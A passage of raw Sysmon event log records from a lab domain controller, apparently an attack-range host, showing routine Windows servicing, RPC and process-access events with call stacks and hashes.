indows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001208Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.961{10ACEC4A-8546-5FCF-2400-000000009101}30562132C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001207Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.883{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001206Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.883{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001205Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.883{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001204Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.879{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe10.0.14393.3926 (rs1_release.200817-1737)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=A8CBBA3111CF28435F7E8C8B94EC6FBD,SHA256=D4DDF9F7CB94FE55C7EA1CA90AB9638A883B84308C858EF466554E32FB17EFC3,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001203Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.852{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001202Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.821{10ACEC4A-853E-5FCF-0A00-000000009101}8521192C:\Windows\system32\services.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001201Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.821{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001200Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.821{10ACEC4A-853E-5FCF-0A00-000000009101}8521140C:\Windows\system32\services.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001199Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.820{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001198Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.805{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001197Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.805{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001196Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.805{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001195Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.805{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001194Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.805{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001193Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.805{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001192Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.805{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001191Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.789{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001190Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.789{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001189Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.789{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001188Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.789{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001187Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.789{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001186Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.789{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001185Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.789{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001184Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 